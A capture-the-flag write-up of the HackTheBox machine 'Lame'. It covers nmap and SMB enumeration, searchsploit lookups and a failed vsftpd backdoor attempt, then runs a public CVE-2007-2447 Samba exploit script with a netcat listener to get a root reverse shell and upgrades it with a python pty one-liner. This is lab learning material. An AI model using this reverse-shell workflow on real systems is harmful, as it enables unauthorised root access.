Posts HackTheBox - Lame

HackTheBox - Lame

Following on from Legacy is was time to complete Lame, the first of many Linux machines. The machine required simple enumeration and another SMB exploit, resulting in a root shell.

Machine IP =



Starting Nmap 7.80 ( ) at 2020-07-19 16:41 BST
Nmap scan report for
Host is up (0.053s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

From our scan we can see FTP is open on 21, as well as ssh being open on port 22. Furthermore, we have SMB open on 139 & 445.


Anonymous Login

FTP anonymous login is enabled, however when checking the directory is is empty.


After some googling, it turns out vsftpd 2.3.4 is commonly backdoored, and so i decided to see if there are any FTP exploits associated with vsftpd 2.3.4 using searchsploit

root@kali:~/Desktop# searchsploit vsftpd 2.3.4
----------------------------------------- ----------------------------------------
 Exploit Title                           |  Path
                                         | (/usr/share/exploitdb/)
----------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Executio | exploits/unix/remote/17491.rb
----------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks promising, so will come back to it after.


Anonymous Login

SMBmap shows the /tmp directory is accessible without credentials.

root@kali:~/Desktop# smbmap -H
[+] Finding open SMB ports....
[+] User SMB session established on
[+] IP:	Name:                                        
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

At first i was unable to connect using smbclient, but after some googling i added client min protocol=NT1 to /etc/samba/smb.conf

However the directory did not yield anything interesting.


Moving on i decided to search for Samba 3 in searchsploit

root@kali:~/Desktop# searchsploit Samba 3.0
-------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                  | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)      | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                    | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)              | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                              | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                     | exploits/multiple/dos/
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                      | exploits/linux/remote/
Samba < 3.0.20 - Remote Heap Overflow                                                 | exploits/linux/remote/7701.txt
-------------------------------------------------------------------------------------- ----------------------------------------

A wide range of exploits are available, with command execution available from Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)


Exploiting VSFTPD

I started by searching msfconsole for any exploits associated with vsftpd.

msf5 > search vsftpd 2.3.4

Matching Modules

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

exploit/unix/ftp/vsftpd_234_backdoor looks interesting, but sadly was unsuccessful.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] - Banner: 220 (vsFTPd 2.3.4)
[*] - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > 

After looking into this exploit a little more, the exploit can be triggered by attempting to login using a username with an :) appended to the end of it, such as anonymous:)

Exploiting Samba

When googling Samba 3 Username remote code execution, CVE-2007-2447 comes up. Further googling provided a python script

Using the script, following the installation instructions allowed for an easy shell.

nc -nvlp 443

and then executing python script

root@kali:~/Desktop/CVE-2007-2447# python 139 443
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

On the netcat listener we are now connected as root.

root@kali:~/Desktop/CVE-2007-2447# nc -nvlp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 59119
uid=0(root) gid=0(root)

Now we spawn a nicer python shell, and start searching for the flags.

python -c 'import pty; pty.spawn("bash")'

Flag Hunting

The flags were actually rather easy to find.


root@lame:/home/makis# cat user.txt
cat user.txt


root@lame:/root# cat root.txt
cat root.txt

Understanding the Python Script

This post is licensed under CC BY 4.0 by the author.